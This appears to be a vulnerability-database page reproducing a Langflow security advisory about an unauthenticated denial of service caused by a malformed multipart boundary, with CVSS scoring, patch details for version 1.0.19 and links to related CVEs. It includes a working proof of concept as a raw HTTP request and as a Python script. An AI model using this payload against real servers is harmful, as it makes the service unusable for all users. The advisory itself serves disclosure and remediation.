Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Single unauthenticated HTTP POST over the network with no user interaction stalls the worker, yielding high availability impact only and no confidentiality or integrity loss.
Primary rating from Vendor (https://github.com/langflow-ai/langflow).
CVSS VectorVendor: https://github.com/langflow-ai/langflow
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
3DescriptionCVE.org
Summary
An attacker can send a /api/v1/files/upload/ request without any authentication token/cookies and abuse a very long multipart form boundary to make the langflow app unusable for all users for an indefinite amount of time.
Details
https://github.com/langflow-ai/langflow/blob/v1.0.18/src/backend/base/langflow/api/v1/files.py#L40
The file upload function will try to process the multipart form data even if it is malformed and contains a payload such as an extremely large amount of hyphens after the boundary. It also does not do the authentication check before trying to process this data so an unauthenticated attacker can perform this as well as authenticated users.
Additionally, an attacker doesn't even need to know a valid UUID of a flow to send this request because the server will still try to process the large boundary even with any random value in place of the flow ID.
PoC
An attacker makes this request to upload a file without valid authentication information or a valid flow ID:
POST /api/v1/files/upload/test HTTP/1.1
Host: 127.0.0.1:7860
Content-Length: 3000192
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryorGBAKSkv5wR6WqJ
Accept: application/json, text/plain, */*
Origin: http://127.0.0.1:7860
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryorGBAKSkv5wR6WqJ
Content-Disposition: form-data; name="file"; filename="dos.txt"
Content-Type: text/plain
DoS in progress!
------WebKitFormBoundaryorGBAKSkv5wR6WqJ------------<insert a large amount of hyphens such as 1,000,000>Here is the request in python:
import requests
url = "http://127.0.0.1:7860/api/v1/files/upload/test"
headers = {
"Content-Type": "multipart/form-data; boundary=---------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ"
}
data = (
"-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ\r\n"
"Content-Disposition: form-data; name=\"file\"; filename=\"dos.txt\"\r\n"
"Content-Type: text/plain\r\n\r\n"
"DoS in progress\r\n"
"-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ--" + '-' * 1000000 + "\r\n"
)
response = requests.post(url, headers=headers, data=data)The app will then be stuck in the "server is busy" state for all users:
<img width="733" alt="image" src="https://github.com/user-attachments/assets/227169d8-f1b7-4072-8c09-e416e4808d05">
Impact
Sending this request will result in the server being unusable for all users for an infinite amount of time because the request can be repeated as much as you want.
Patches
Fixed in 1.0.19 via PR #3923. A check_boundary HTTP middleware was added that validates the multipart boundary (^[\w\-]{1,70}$) and rejects malformed requests - including the oversized-hyphen payload - with HTTP 422 before the body is parsed. The upload endpoint also gained an authentication and flow-ownership check (get_current_active_user + 403 on mismatch), closing the unauthenticated access vector. Upgrade to 1.0.19 or later.
AnalysisAI
Unauthenticated denial-of-service in Langflow versions prior to 1.0.19 allows remote attackers to render the application unusable for all users indefinitely by sending a single crafted POST to /api/v1/files/upload/ with a malformed multipart boundary containing a very large run of hyphens. The upload endpoint processes the multipart body before performing authentication or flow-ID validation, so no token, cookie, or valid flow UUID is required. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | No special conditions - remote unauthenticated exploitation against default configurations of Langflow versions prior to 1.0.19 that expose /api/v1/files/upload/ over HTTP. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (base 7.5) is consistent with the description: a single unauthenticated network request causes high availability impact with no confidentiality or integrity loss. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who can reach the Langflow HTTP port sends a single POST to /api/v1/files/upload/<anything> with a multipart body whose closing boundary is padded with ~1,000,000 hyphens, using the public PoC from the advisory verbatim. The FastAPI worker spins on multipart parsing and the application reports 'server is busy' to all users; the attacker simply repeats the request to keep the service down indefinitely. |
| Remediation | Vendor-released patch: upgrade Langflow to 1.0.19 or later, which introduces the check_boundary middleware and adds get_current_active_user plus a 403 flow-ownership check on /api/v1/files/upload/ (see https://github.com/langflow-ai/langflow/pull/3923 and advisory https://github.com/langflow-ai/langflow/security/advisories/GHSA-qwqc-p3q8-wcg9). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all Langflow instances in production and determine which versions are deployed. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-400 – Uncontrolled Resource Consumption
View allSame technique Denial Of Service
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38515
GHSA-qwqc-p3q8-wcg9